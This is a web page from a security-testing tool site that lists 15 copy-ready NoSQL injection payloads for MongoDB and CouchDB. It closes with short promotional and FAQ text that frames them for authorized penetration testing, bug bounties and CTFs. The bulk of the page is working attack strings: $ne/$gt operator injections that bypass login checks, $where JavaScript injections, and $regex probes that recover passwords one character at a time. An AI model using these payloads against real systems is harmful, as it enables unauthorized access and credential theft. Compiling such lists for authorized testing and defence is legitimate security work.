NoSQL injection payloads for MongoDB, CouchDB, and other NoSQL databases. (15 payloads)
{"username": {"$ne": ""}, "password": {"$ne": ""}}username[$ne]=&password[$ne]={"username": {"$gt": ""}, "password": {"$gt": ""}}username[$regex]=.*&password[$regex]=.*{"username": {"$in": ["admin", "root"]}, "password": {"$ne": ""}}{"username": "admin", "password": {"$exists": true}}{"$where": "this.username == 'admin'"}{"$where": "function() { return true; }"}{"username": {"$regex": "^adm"}}{"price": {"$gt": 0, "$lt": 1}}{"$or": [{"username": "admin"}, {"username": "root"}]}username=admin&password[$regex]=^ausername=admin&password[$regex]=^ab{"username": "admin", "password": {"$regex": "^.{8}$"}}{"username": {"$regex": "^.{0,5}$"}}Level up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides
It's a quick-reference collection of 15 NoSQLi payloads for testing NoSQL Injection vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.
Copy any payload straight into your authorized test, or open the SQL Injection generator to build customized NoSQLi variants with encoding and WAF-bypass options. Only test systems you have explicit permission to assess.
Yes — this cheat sheet and all NoSQLi payloads are completely free, with no account required. Everything runs in your browser.